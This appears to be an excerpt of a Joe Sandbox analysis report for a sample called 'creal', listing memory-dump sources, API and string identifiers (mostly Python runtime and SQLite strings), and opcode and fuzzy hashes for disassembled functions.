                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: 3f2332356931184e6501015defa88c1d245f7b25bfe9b71bbf2c72ea6a00fa8a
                                                                                                                                                                                                                • Instruction ID: 7c075592470a8fe9c08fefb30f3ba66405b4b71bdfc411d1bb0ce669e608d2df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2332356931184e6501015defa88c1d245f7b25bfe9b71bbf2c72ea6a00fa8a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD319BB5E0CB8785FA188F91E8513A837A5BF18BD1F440536D96E4B760EF3CA158C782
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: 75194c0cbc9a507f0b92e1b34c94570ff1e2da8f97792c352aaccb42d87fe693
                                                                                                                                                                                                                • Instruction ID: 4f08edc5f3f119aacdcfc815fffe26acc81f2fb0d25f3449467af87b785fbb1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75194c0cbc9a507f0b92e1b34c94570ff1e2da8f97792c352aaccb42d87fe693
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA21CDA9E0DB9785FA499FC1F8503B823A5BF05BD1F844635C82E5B260EF3CA1598342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
                                                                                                                                                                                                                • Instruction ID: e8162334ba87c393e0313e8439e9bfd8d4afa49c1635c15131bd3375de775264
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21AE75E0DB8381FA0A9F84F8443BC22A6AF05BD1F484635C82D1B760EF3CA1698352
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
                                                                                                                                                                                                                • Instruction ID: 9305595211646345cfdad7ace9c6bed10e2fc720fd05263f71a66025a816a05c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21AEA5E0DB9781FA099F91F8513BC32A5BF08BD1F454535C82D1B660EF3CA659C382
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
                                                                                                                                                                                                                • Instruction ID: 9cfe270bf9549bbbdd36a186b38a9244427921aeb49a744aba97b98dee843f8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821ABA5E0DB9785FA488F91F8413BC22A5AB05BD1F480635D86D4A360EF3CA558C352
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
                                                                                                                                                                                                                • Instruction ID: dbd64fb3edeb16bac011e5a21711cf98fe498edb2819ea409594608b9ba893cf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D21CC75E0CB8781FA088F90F8843BC23A6AF08BD1F484435C92D1B260EF3DA1588382
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>$>
                                                                                                                                                                                                                • API String ID: 4228545439-4024159097
                                                                                                                                                                                                                • Opcode ID: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
                                                                                                                                                                                                                • Instruction ID: efe95e375999378b2b5e995c773bd650be34a7f0c35fc2d84e1e940e51af8ddd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C80116A6E09B8381FB1D5BD4E84137D22A2AF40BD1F444035CA2E1B3A0DF3DA4859313
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: 2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                • API String ID: 3510742995-3617401034
                                                                                                                                                                                                                • Opcode ID: 1c93ec38d3358962f044fd8c9bc7468739eb095e07bda336951e211f631fe774
                                                                                                                                                                                                                • Instruction ID: e3adb46f5f6bf6d40ab8fb43e50fc0616b2cc1d6bfe06f79c594a16fb1e8e616
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c93ec38d3358962f044fd8c9bc7468739eb095e07bda336951e211f631fe774
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85326772F286668AE7109FA5984437D77A1FB45BC8F104132EA5D97B98DF3CE841CB02
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                • API String ID: 3510742995-1299490920
                                                                                                                                                                                                                • Opcode ID: ebcd032ed702c523410fed20a5182b5d1ca5bd3a286d7c744cd26ba470fb2b13
                                                                                                                                                                                                                • Instruction ID: 4289cacdf3454c7da849fbd4445c03db509f6f2ec06c7dd4b0e31c9f410105bc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebcd032ed702c523410fed20a5182b5d1ca5bd3a286d7c744cd26ba470fb2b13
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF1DD72A28B86C5EB509B96948837A77A0FF45BD4F484232DE4E47795DF3CE491C302
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 3510742995-3418467682
                                                                                                                                                                                                                • Opcode ID: 91602f75254d7218a0107a53bc688bcdb00c3f4e10742aadde5f37c0e5b1a09d
                                                                                                                                                                                                                • Instruction ID: 34dfac3e33041de2c2a1b79ab5fc3f229078682130dccb3c864288e9c6a5c713
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91602f75254d7218a0107a53bc688bcdb00c3f4e10742aadde5f37c0e5b1a09d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF17A72B28B9586DBA09B96E0447AD77A8FB49BC4F048036EE8D43B55DF3DD444C702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                • Opcode ID: b4ecf18cf932ab09c5a0dcd71d723e699248de27d3a2c53308080df3d2a3ce49
                                                                                                                                                                                                                • Instruction ID: 79593c0ff1c7db9e404e317144fc344f3f105ba587d1ec8dcf448702088c34da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4ecf18cf932ab09c5a0dcd71d723e699248de27d3a2c53308080df3d2a3ce49
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD18C72B18B9586DB50CB66E0047A977A8FB88BC4F158036DE4D47B94DF3DD882C311
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FF8E6937F95,?,?,00000000), ref: 00007FF8E6937770
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FF8E6937F95,?,?,00000000), ref: 00007FF8E69378B7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                                • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                • API String ID: 1297977491-2903559916
                                                                                                                                                                                                                • Opcode ID: 7db31c1c0feca94d0fe2313bbd611dd5f68d38f3a15ed93a798a1538fb93f959
                                                                                                                                                                                                                • Instruction ID: df2a8111dc606e41bb1ec17cd1b093a7c629f2789d9cea7512c1adfd567e0261
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db31c1c0feca94d0fe2313bbd611dd5f68d38f3a15ed93a798a1538fb93f959
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82C1EF22B6969785EA25EBA190983B97BA0FF41BD4F084235CE5D4B7C5DF3CE801C306
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 3510742995-3418467682
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 0-3418467682
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00007FF8E694ACA8), ref: 00007FF8E694AB67
                                                                                                                                                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00007FF8E694ACA8), ref: 00007FF8E694AB81
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF8E694ACA8), ref: 00007FF8E694AC18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strncmp$memcpy
                                                                                                                                                                                                                • String ID: CRE$INS
                                                                                                                                                                                                                • API String ID: 2549481713-4116259516
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpymemmove
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 167125708-3418467682
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocFromLong_Ssize_t$BoolCompareObject_Rich
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4107546884-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3617616757-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
